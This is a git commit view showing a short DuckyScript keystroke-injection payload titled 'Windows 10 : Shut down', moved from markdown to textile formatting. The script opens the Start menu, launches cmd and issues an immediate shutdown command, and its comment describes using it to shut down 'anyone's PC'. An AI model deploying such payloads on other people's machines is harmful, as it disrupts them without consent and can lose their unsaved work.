Updated Payload Windows 10 : Shut down (markdown => textile)

This commit is contained in:
gaspypm 2016-12-21 21:54:52 -03:00
parent d2db39dd06
commit 285d9577e1
2 changed files with 7 additions and 7 deletions

View File

@ -1,7 +0,0 @@
* REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code.
* CONTROL ESCAPE
* DELAY 400
* STRING cmd
* DELAY 200
* STRING shutdown.exe /s /t 00
* ENTER

View File

@ -0,0 +1,7 @@
REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code.
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 200
STRING shutdown.exe /s /t 00
ENTER